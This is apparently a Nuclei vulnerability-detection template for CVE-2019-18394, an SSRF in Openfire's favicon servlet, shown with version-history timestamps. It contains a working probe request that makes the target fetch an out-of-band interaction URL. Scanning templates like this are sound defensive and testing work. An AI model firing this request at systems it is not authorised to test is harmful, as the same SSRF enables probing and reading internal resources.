nuclei-templates/cves/2019/CVE-2019-18394.yaml

22 lines
685 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-18394
2020-08-04 15:24:23 +00:00
info:
name: Openfire Full Read SSRF
2021-04-09 22:19:09 +00:00
author: pdteam
2020-08-04 15:24:23 +00:00
severity: critical
2021-03-30 12:10:17 +00:00
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
refrense: |
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
2021-07-19 12:43:09 +00:00
tags: cve,cve2019,ssrf,openfire,oob
2020-08-04 15:24:23 +00:00
requests:
- method: GET
path:
2021-07-19 12:43:09 +00:00
- "{{BaseURL}}/getFavicon?host=http://{{interactsh-url}}"
2020-08-04 15:24:23 +00:00
matchers:
- type: word
2021-07-19 12:43:09 +00:00
part: interactsh_protocol # Confirms the HTTP Interaction
2020-08-04 15:24:23 +00:00
words:
2021-07-19 12:43:09 +00:00
- "http"